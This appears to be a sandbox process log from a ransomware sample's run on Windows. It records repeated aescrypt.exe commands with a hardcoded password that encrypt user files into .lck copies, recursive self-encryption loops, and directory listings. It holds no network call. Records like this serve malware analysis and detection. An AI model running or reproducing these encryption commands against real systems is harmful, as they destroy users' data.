C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "java_install_reg.log.lck" "java_install_reg.log"
3⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "JavaDeployReg.log.lck" "JavaDeployReg.log"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_wcf_CA_smci_20201028_185700_802.txt.lck" "dd_wcf_CA_smci_20201028_185700_802.txt"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RGI192C.tmp-tmp.lck" "RGI192C.tmp-tmp"
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "final.exe.lck" "final.exe"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RGI192C.tmp.lck" "RGI192C.tmp"
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_vcredistUI7311.txt.lck" "dd_vcredistUI7311.txt"
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "chrome_installer.log.lck" "chrome_installer.log"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Admin.bmp.lck" "Admin.bmp"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Microsoft.lck" "Microsoft"
3⤵
PID:1940

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ose00000.exe.lck" "ose00000.exe"
3⤵
PID:1532

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "java_install.log.lck" "java_install.log"
3⤵
PID:1020

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SetupExe(202010281908278F4).log.lck" "SetupExe(202010281908278F4).log"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_vcredistMSI7311.txt.lck" "dd_vcredistMSI7311.txt"
3⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BleachGap.bin.exe.lck" "BleachGap.bin.exe"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Microsoft.lck" "Microsoft"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Microsoft.lck" "Microsoft"
3⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:1080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:1364

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:928

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:1192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:2012

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:872

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:584

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:1612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:1640

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:1744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:912

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:1680

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:1112

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
3⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
3⤵
PID:212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:820

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:1392

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:308

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
3⤵
PID:2004

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
3⤵
PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1780

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:600

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
3⤵
PID:1988

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
3⤵
PID:972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck.lck"
3⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:1832

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:756

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
3⤵
PID:1940

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck"
3⤵
PID:1532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1020

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck" "aescrypt.exe"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
3⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
3⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
3⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck.lck"
3⤵
PID:1232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "aescrypt.exe.lck.lck.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:680

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
3⤵
PID:820

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck"
3⤵
PID:1392

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:236

